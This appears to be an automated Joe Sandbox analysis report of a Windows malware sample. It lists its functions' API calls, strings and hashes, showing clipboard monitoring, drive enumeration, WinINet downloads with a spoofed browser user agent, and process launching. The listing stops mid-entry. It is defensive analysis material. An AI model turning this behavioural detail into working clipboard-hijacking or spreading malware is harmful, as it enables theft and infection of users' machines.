OpenClipboard.USER32(00000000), ref: 00405A77
GetClipboardData.USER32(00000000), ref: 00405A89
RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B90
ChangeClipboardChain.USER32(?,?), ref: 00405B9E
DefWindowProcA.USER32(?,?,?,?), ref: 00405BB4

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
String ID:
API String ID: 3549449529-0
Opcode ID: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
Instruction ID: 2c6a07511b676f4089081adff438ee2b95572153aa6d486a7a165f398962c3b3
Opcode Fuzzy Hash: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
Instruction Fuzzy Hash: 9A711A74A00608EBDF14DFA4D988BAF77B4EF48301F14852AE505B6290D779AA80CF69

Function 00405880 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73
windowsleepregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 00405898
GetModuleHandleW.KERNEL32(00000000), ref: 004058B0
Sleep.KERNEL32(00000001), ref: 004058C4
GetTickCount.KERNEL32 ref: 004058CA
GetTickCount.KERNEL32 ref: 004058D3
wsprintfW.USER32 ref: 004058E6
RegisterClassExW.USER32(00000030), ref: 004058F3
CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040591C
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405937
TranslateMessage.USER32(?), ref: 00405945
DispatchMessageA.USER32(?), ref: 0040594F
ExitThread.KERNEL32 ref: 00405961

Strings

%x%X, xrefs: 004058DA
0, xrefs: 004058A0

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
String ID: %x%X$0
API String ID: 716646876-225668902
Opcode ID: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
Instruction ID: 85e967beda8c0998690da8d5d0b59a8f0be79fc45de23a81cc248e6733ffc6a2
Opcode Fuzzy Hash: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
Instruction Fuzzy Hash: DB211DB1940308BBEB10ABA0DC49FEE7B78EB04711F10812AF601BA1D0DBB99545CF68

Function 0040DBC0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0040DBE8
InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
memcpy.NTDLL(00000000,?,00000000), ref: 0040DD7A
InternetCloseHandle.WININET(00000000), ref: 0040DDB7
InternetCloseHandle.WININET(00000000), ref: 0040DDC4
InternetCloseHandle.WININET(00000000), ref: 0040DDD1

Strings

GET, xrefs: 0040DCAB
<, xrefs: 0040DBF0

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
String ID: <$GET
API String ID: 1205665004-427699995
Opcode ID: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
Instruction ID: 2be109b622ab9a99a7f53353d246b615867c30bbfdc4ae23a93fa512118ea852
Opcode Fuzzy Hash: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
Instruction Fuzzy Hash: CA511CB5D01228ABDB36CB50CC55BE9B7BCAB44705F0480E9E60DAA2C0D7B96BC4CF54

Function 00406BC0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 106
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000003E8), ref: 00406BCE
GetModuleFileNameW.KERNEL32(00000000,00415E58,00000104), ref: 00406BE0

Part of subcall function 0040E770: CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
Part of subcall function 0040E770: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
Part of subcall function 0040E770: CloseHandle.KERNEL32(000000FF), ref: 0040E7B2

ExitThread.KERNEL32 ref: 00406D4A

Part of subcall function 004063A0: GetLogicalDrives.KERNEL32 ref: 004063A6
Part of subcall function 004063A0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
Part of subcall function 004063A0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
Part of subcall function 004063A0: RegCloseKey.ADVAPI32(?), ref: 0040643E

Sleep.KERNEL32(00000BB8), ref: 00406D3D

Part of subcall function 004062C0: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313

GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C7F
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C94
_aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406CAF
wsprintfW.USER32 ref: 00406CC2
wsprintfW.USER32 ref: 00406CE2
wsprintfW.USER32 ref: 00406D05

Strings

(%dGB), xrefs: 00406CB6
Unnamed volume, xrefs: 00406CD6
%s%s, xrefs: 00406CF9

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
String ID: (%dGB)$%s%s$Unnamed volume
API String ID: 1650488544-2117135753
Opcode ID: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
Instruction ID: f0476b63a1379e6dca01d87e2afc3553bbde202c422fcd3a3a6a752a7ad43008
Opcode Fuzzy Hash: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
Instruction Fuzzy Hash: 53418471900318ABEB14DB94DD45FEE7778BB44700F1045A9F20AA51D0DB785B94CF6A

Function 0040E7C0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 144
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F2
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040E813
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040E832
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E84B
memcmp.NTDLL ref: 0040E8DD
UnmapViewOfFile.KERNEL32(00000000), ref: 0040E900
CloseHandle.KERNEL32(00000000), ref: 0040E90A
CloseHandle.KERNEL32(000000FF), ref: 0040E914
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040E933
WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040E958
CloseHandle.KERNEL32(000000FF), ref: 0040E962

Strings

.ou, xrefs: 0040E90A, 0040E914, 0040E962

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
String ID: .ou
API String ID: 3902698870-3683031111
Opcode ID: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
Instruction ID: 0da617c1af0bd4dbc976a582f880bbe3058530cb6ade4bb6176e088db5cb8200
Opcode Fuzzy Hash: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
Instruction Fuzzy Hash: D3516DB5E00308FBDB14DBA4CC49BEEB774AB48304F108569F611BB2C1D7B9AA40CB58

Function 0040B2C0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00416690,?,?,?,?,?,?,00407A56), ref: 0040B2CB
CreateFileW.KERNEL32(00416478,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B31D
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B33E
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B35D
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B372
UnmapViewOfFile.KERNEL32(00000000), ref: 0040B3D8
CloseHandle.KERNEL32(00000000), ref: 0040B3E2
CloseHandle.KERNEL32(000000FF), ref: 0040B3EC

Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5,?,0040B3B5,00000000), ref: 0040D4AA
Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8

Strings

Vz@, xrefs: 0040B33A, 0040B3E8, 0040B36E
.ou, xrefs: 0040B3E2, 0040B3EC

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
String ID: Vz@$.ou
API String ID: 439099756-1244017076
Opcode ID: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
Instruction ID: 3b431581fb8605495e02e5545908ab4f756817927d1539066ca4ce1953719e7c
Opcode Fuzzy Hash: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
Instruction Fuzzy Hash: 91411C74E40309EBDB10DFA4DC4ABAEB774EB44704F208569EA11BA2C1C7B96541CB9D

Function 0040E980 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60sleepprocessCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0040E98E
memset.NTDLL ref: 0040E99E
CreateProcessW.KERNEL32(00000000,Gy@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040E9D7
Sleep.KERNEL32(000003E8), ref: 0040E9E7
ShellExecuteW.SHELL32(00000000,open,Gy@,00000000,00000000,00000000), ref: 0040EA02
Sleep.KERNEL32(000003E8), ref: 0040EA1C

Strings

, xrefs: 0040EA11
open, xrefs: 0040E9FB
D, xrefs: 0040E9A6
Gy@, xrefs: 0040E9D1, 0040E9F7, 0040E9D4, 0040E9FA

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Sleepmemset$CreateExecuteProcessShell
String ID: $D$Gy@$open
API String ID: 3787208655-4184347819
Opcode ID: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
Instruction ID: afb7e97e53159593a654a1f5a0506a904f07d925a59540ad2b26a1d3cea08ed0
Opcode Fuzzy Hash: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
Instruction Fuzzy Hash: 08114271A90308BBE710DB91CD46FDE7774AB04B00F200129F6087E2C1D6F9AA54CB59

Function 0040D2D0 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0040D2D6
GetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2DD
GetCurrentThread.KERNEL32 ref: 0040D2E8
SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2EF
InterlockedExchangeAdd.KERNEL32(00407AD2,00000000), ref: 0040D312
EnterCriticalSection.KERNEL32(000000FB), ref: 0040D347
WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D392
LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D3AE
Sleep.KERNEL32(00000001), ref: 0040D3DE
GetCurrentThread.KERNEL32 ref: 0040D3ED
SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2), ref: 0040D3F4

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
String ID:
API String ID: 3862671961-0
Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
Instruction ID: a8d0ef9cc0f8c3f9fe641a145e15df681aa384361be6a62e8494921e8eef4e23
Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
Instruction Fuzzy Hash: 0A411A74D00209EFDB04DFE4D888BAEBB71EB44315F14816AE916A7380D7789A85CF5A

Function 00405BC0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00415E30,?,?,?,?,?,00407A20), ref: 00405BCB
CreateFileW.KERNEL32(00416060,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407A20), ref: 00405BE5
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C06
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C25
GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C3E
UnmapViewOfFile.KERNEL32(00000000), ref: 00405CCB
CloseHandle.KERNEL32(00000000), ref: 00405CD5
CloseHandle.KERNEL32(000000FF), ref: 00405CDF

Strings

.ou, xrefs: 00405CD5, 00405CDF

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
String ID: .ou
API String ID: 3956458805-3683031111
Opcode ID: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
Instruction ID: 44e1aa5071e985e1939c8a19f3b292d5e35966d71e561f6040ad28af9ac572d1
Opcode Fuzzy Hash: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
Instruction Fuzzy Hash: 4B31FD74E44309EBEB14DBA4CD49BAFBB74EB48700F208569E601772C0D7B96941CF99

Function 00406060 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00415E30,00000000,0040B8F2,006A0266,?,0040B90E,00000000,0040D0A4,?), ref: 0040606F
memcpy.NTDLL(?,00000000,00000100), ref: 00406101
CreateFileW.KERNEL32(00416060,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406225
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406287
FlushFileBuffers.KERNEL32(000000FF), ref: 00406293
CloseHandle.KERNEL32(000000FF), ref: 0040629D
LeaveCriticalSection.KERNEL32(00415E30,?,?,?,?,?,?,0040B90E,00000000,0040D0A4,?), ref: 004062A8

Strings

.ou, xrefs: 0040629D

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
String ID: .ou
API String ID: 1457358591-3683031111
Opcode ID: b744e7b7a8629e3496ebe2098ab67372d645442e6c28ada4e438c42de121c9cd
Instruction ID: bb102638da67a563b53aa46b2a5b6ce2f3b38349fb156310049a7a66f3822ae6
Opcode Fuzzy Hash: b744e7b7a8629e3496ebe2098ab67372d645442e6c28ada4e438c42de121c9cd
Instruction Fuzzy Hash: 1D71DEB5E002099BCB04DF94D981FEFB7B1BB88304F14816DE505BB382D779A951CBA5

Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
InterlockedDecrement.KERNEL32(?), ref: 00401DB0
InterlockedDecrement.KERNEL32(?), ref: 00401DC3
InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
InterlockedDecrement.KERNEL32(?), ref: 00401E5B
InterlockedDecrement.KERNEL32(?), ref: 00401EF6
setsockopt.WS2_32 ref: 00401F2C
closesocket.WS2_32(?), ref: 00401F39

Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5,?,0040B3B5,00000000), ref: 0040D4AA
Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
String ID:
API String ID: 671207744-0
Opcode ID: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
Instruction ID: a48952fab395babe4cfd63b323185ec8fb23c48b53ef468cda2161a158f186bf
Opcode Fuzzy Hash: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
Instruction Fuzzy Hash: 7A51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96

Function 0040D890 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON

Download Yara Rule

APIs

recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
Sleep.KERNEL32(000003E8), ref: 0040D8EE
StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E

Strings

HTTP/1.1 200 OK, xrefs: 0040D8FF
LOCATION: , xrefs: 0040D915

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Sleeprecvfrom
String ID: HTTP/1.1 200 OK$LOCATION:
API String ID: 668330359-3973262388
Opcode ID: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
Instruction ID: aa1d0310fbaa0e5548ad160d3530673878f91993e129ff42f305da2a80d3425b
Opcode Fuzzy Hash: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
Instruction Fuzzy Hash: 88215EB5D00218ABDB20DF64DC49BE97774AB04708F1486E9E719B62C0C7B95ACA8F5C

Function 0040EA30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EA47
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EA66
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EA8F
InternetCloseHandle.WININET(00000000), ref: 0040EAB8
InternetCloseHandle.WININET(00000000), ref: 0040EAC2
Sleep.KERNEL32(000003E8), ref: 0040EACD

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040EA42

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
API String ID: 2743515581-2960703779
Opcode ID: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
Instruction ID: 45b81d3650d60dd7d70083547d95fe89803667d47bfd0af2cf5eef3cde06382e
Opcode Fuzzy Hash: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
Instruction Fuzzy Hash: 4021E774A40308BBEB11DB94CC49FEEB775BB48705F1085A9FA11AA2C0C7B96A40CB55

Function 0040E240 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
SysFreeString.OLEAUT32(00000000), ref: 0040E35F
SysFreeString.OLEAUT32(00000000), ref: 0040E377

Strings

device, xrefs: 0040E2F3
deviceType, xrefs: 0040E306

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
Instruction ID: d9bf12878483276118e69e011fb1eaaed98ea0d23904e8601ea4f62f39df24ad
Opcode Fuzzy Hash: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
Instruction Fuzzy Hash: C4412D74A0020ADFCB04DF95C884FAFBBB5BF49304F108969E915A7390D778AD81CB95

Function 0040E0E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
SysFreeString.OLEAUT32(00000000), ref: 0040E217

Strings

serviceType, xrefs: 0040E1A6
service, xrefs: 0040E193

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
Instruction ID: 8be64e74ab35422ce5b67f5b255e261f781d2e412f5a45cda6e842047ddde31e
Opcode Fuzzy Hash: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
Instruction Fuzzy Hash: BB41E874A0020ADFCB14CF99C884BAFB7B9BF48304F1085ADE515A7390D778AA81CF95

Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE

Memory Dump Source

